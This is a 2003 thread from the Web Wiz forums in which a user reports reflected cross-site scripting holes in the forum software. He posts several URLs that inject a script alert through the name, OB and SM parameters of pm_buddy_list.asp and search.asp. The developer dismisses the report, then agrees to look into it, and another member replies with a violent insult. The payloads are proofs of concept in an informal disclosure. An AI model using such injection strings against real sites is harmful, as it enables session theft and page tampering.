Cross site scripting

Post Reply

Author	Message Topic Search Topic Options Post Reply Create New Topic Printable Version Translate Topic
PK95 Members Profile Find Members Posts Newbie Joined: 29 April 2003 Status: Offline Points: 5	Post Options Post Reply Quote PK95 Report Post Thanks(0) Quote Reply Topic: Cross site scripting Posted: 29 April 2003 at 3:29am
	<>alert('error%2031337:%20you%20are%20hacked')http://forums.webwiz.net/pm_buddy_list.asp?name="><script>alert('error%2031337:%20you%20are%20hacked')</script> <>alert('error%2031337:%20you%20are%20hacked')http://forums.webwiz.net/search.asp?KW=sdfgs&SM=1&SI=TC&FM=0&OB="><script>alert('error%2031337:%20you%20are%20hacked')</script> <>alert('error%2031337:%20you%20are%20hacked')&SI=TC&FM=0&OB=1">http://forums.webwiz.net/search.asp?KW=sdfgs&SM=="><script>alert('error%2031337:%20you%20are%20hacked')</script>&SI=TC&FM=0&OB=1 And I found more 20 XSS HOLE!

PK95 Members Profile Find Members Posts Newbie Joined: 29 April 2003 Status: Offline Points: 5	Post Options Post Reply Quote PK95 Report Post Thanks(0) Quote Reply Posted: 29 April 2003 at 3:32am
	Sorry forum/pm_buddy_list.asp?name="><script>alert('error%2031337:%20you%20are%20hacked')</script> forum/search.asp?KW=sdfgs&SM=1&SI=TC&FM=0&OB="><script>alert('error%2031337:%20you%20are%20hacked')</script> forum/search.asp?KW=sdfgs&SM=="><script>alert('error%2031337:%20you%20are%20hacked')</script>&SI=TC&FM=0&OB=1 And I found more 20 XSS HOLE!

fbridge2 Members Profile Find Members Posts Newbie Joined: 29 April 2003 Location: United Kingdom Status: Offline Points: 18	Post Options Post Reply Quote fbridge2 Report Post Thanks(0) Quote Reply Posted: 29 April 2003 at 3:39am
	There are no cross site scripts on this board. May God roast your stomachs in hell under the walls of Baghdad before you post again.

WebWiz-Bruce Members Profile Find Members Posts Admin Group Web Wiz Developer Joined: 03 September 2001 Location: Bournemouth Status: Offline Points: 9844	Post Options Post Reply Quote WebWiz-Bruce Report Post Thanks(0) Quote Reply Posted: 29 April 2003 at 6:06am
	That not a security problem, you can do that to any page on the internet. If you have found any real XSS hacks then please let me know.
	Web Wiz Forums Hosting ASP.NET Web Hosting

fbridge2 Members Profile Find Members Posts Newbie Joined: 29 April 2003 Location: United Kingdom Status: Offline Points: 18	Post Options Post Reply Quote fbridge2 Report Post Thanks(0) Quote Reply Posted: 29 April 2003 at 6:46am
	Ha ha - sorry -boRg- I thought he was calling you an xss hole! Frank

PK95 Members Profile Find Members Posts Newbie Joined: 29 April 2003 Status: Offline Points: 5	Post Options Post Reply Quote PK95 Report Post Thanks(0) Quote Reply Posted: 29 April 2003 at 7:07am
	Whats? It's real bug, which use to steal cookies!!! http://forums.webwiz.net/pm_buddy_list.asp?name="><script>alert('error%2031337:%20you%20are%20hacked')</script>

WebWiz-Bruce Members Profile Find Members Posts Admin Group Web Wiz Developer Joined: 03 September 2001 Location: Bournemouth Status: Offline Points: 9844	Post Options Post Reply Quote WebWiz-Bruce Report Post Thanks(0) Quote Reply Posted: 29 April 2003 at 7:36am
	I'll look into it then.
	Web Wiz Forums Hosting ASP.NET Web Hosting

Post Reply

Forum Jump

Forum Permissions View Drop Down

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot delete your posts in this forum
You cannot edit your posts in this forum
You cannot create polls in this forum
You cannot vote in polls in this forum

About Web Wiz | Contact Web Wiz | Terms & Conditions | Cookies | Privacy Notice

Web Wiz is the trading name of Web Wiz Ltd. Company registration No. 05977755. Registered in England and Wales.
Registered office: Web Wiz Ltd, Unit 18, The Glenmore Centre, Fancy Road, Poole, Dorset, BH12 4FB, UK.

Prices exclude VAT at 20% unless otherwise stated. VAT No. GB988999105 - $, € prices shown as a guideline only.